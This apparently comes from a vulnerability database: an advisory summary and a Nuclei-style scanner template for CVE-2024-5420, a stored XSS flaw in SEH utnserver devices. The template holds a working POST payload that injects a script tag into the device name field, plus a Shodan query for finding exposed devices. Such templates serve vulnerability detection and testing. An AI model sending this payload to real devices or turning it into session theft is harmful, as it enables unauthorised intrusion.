A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.
PoC代码[已公开]
id: CVE-2024-5420
info:
name: SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting
author: bl4ckp4r4d1s3
severity: high
description: |
A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.
impact: |
Authenticated attackers can inject malicious JavaScript into the device description field, leading to stored XSS that can hijack user sessions when victims access the interface.
remediation: |
Update SEH utnserver Pro/ProMAX/INU-100 to a version later than 20.1.22 that addresses the XSS vulnerability.
reference:
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html
- https://seclists.org/fulldisclosure/2024/Jun/4
- https://nvd.nist.gov/vuln/detail/CVE-2024-5420
- http://seclists.org/fulldisclosure/2024/Jun/4
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-oring-iap420/index.html
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L
cvss-score: 8.3
cve-id: CVE-2024-5420
cwe-id: CWE-79
epss-score: 0.40163
epss-percentile: 0.97211
metadata:
verified: true
max-request: 1
shodan-query: html:"utnserver Control Center"
tags: cve,cve2024,utnserver,seh,xss,seclists,vuln
http:
- raw:
- |
POST /device/description_en.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'value="“><script>alert(document.domain)</script>" id="standort"'
- 'Host name</label>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100a131a623f247be77c52e20584347870dbd446777af2a54d0a83d9d9184fb39a602205dfba8ee2b19d807ae132f953042d5235cac540d3180ce050cd78b8bcf0810f3:922c64590222798bb761d5b6d8e72950